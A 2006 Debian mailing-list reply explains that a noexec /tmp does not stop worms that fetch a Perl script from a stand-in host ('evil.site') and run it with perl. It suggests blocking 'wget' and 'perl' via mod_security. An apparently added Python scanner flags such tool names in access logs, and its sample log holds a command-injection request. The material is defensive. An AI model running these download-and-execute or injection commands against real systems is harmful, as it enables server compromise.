On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote:

> If you have to leave some writable folders for Apache user, say, /tmp,
> moving /tmp to another partition/filesystem and mounting it with
> "noexec" option would prevent most harm /any/ PHP script can cause.

Not true. Several of the recent exploit worms do the equivalent of this:

    cd /tmp
    wget http://evil.site/perl/script.pl
    perl /tmp/script.pl &

Even if the /tmp partition is mounted noexec this will still work.
(Although '/tmp/script.pl &' would fail.)

Noexec can help in some situations, but blocking 'wget', 'perl' etc in
requests via mod_security is a much more useful thing to do.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
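
Added example, not part of the message above and not a mod_security rule: a log-review counterpart to the keyword blocking suggested there, flagging requests whose decoded query parameters name 'wget' or 'perl'. The function names, the tool list layout and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Tool names taken from the message above; extend the tuple as needed.
TOOLS = ("wget", "perl")
# Whole-word match, so a value such as "perlite" is not flagged.
TOOL_RE = re.compile(
    r"(?<![A-Za-z0-9_])(" + "|".join(TOOLS) + r")(?![A-Za-z0-9_])", re.I
)
# Request line as it appears in Apache common/combined access logs.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(log_line):
    """Return sorted (parameter, tool) pairs found in decoded query values."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    hits = set()
    # parse_qsl percent-decodes each value and turns '+' into a space,
    # so encoded separators such as %3B are seen in their decoded form.
    for name, value in parse_qsl(urlsplit(m.group(1)).query,
                                 keep_blank_values=True):
        for tool in TOOL_RE.findall(value):
            hits.add((name, tool.lower()))
    return sorted(hits)


def scan(lines):
    """Map line index -> hits, for lines with at least one hit."""
    return {i: h for i, h in
            ((i, suspicious_params(l)) for i, l in enumerate(lines)) if h}


# Constructed sample access-log lines (not from the original message).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Mar/2006:09:10:01 +0000] '
    '"GET /index.php?page=news HTTP/1.1" 200 5120',
    '192.0.2.77 - - [13/Mar/2006:09:10:05 +0000] '
    '"GET /view.php?cmd=cd+/tmp%3Bwget+http://evil.site/perl/script.pl'
    '%3Bperl+/tmp/script.pl HTTP/1.0" 200 312',
    '192.0.2.10 - - [13/Mar/2006:09:11:40 +0000] '
    '"GET /search.php?q=perlite+soil HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```

Only the query string is inspected here; POST bodies do not appear in a standard access log and need request-level inspection such as the mod_security filtering mentioned above.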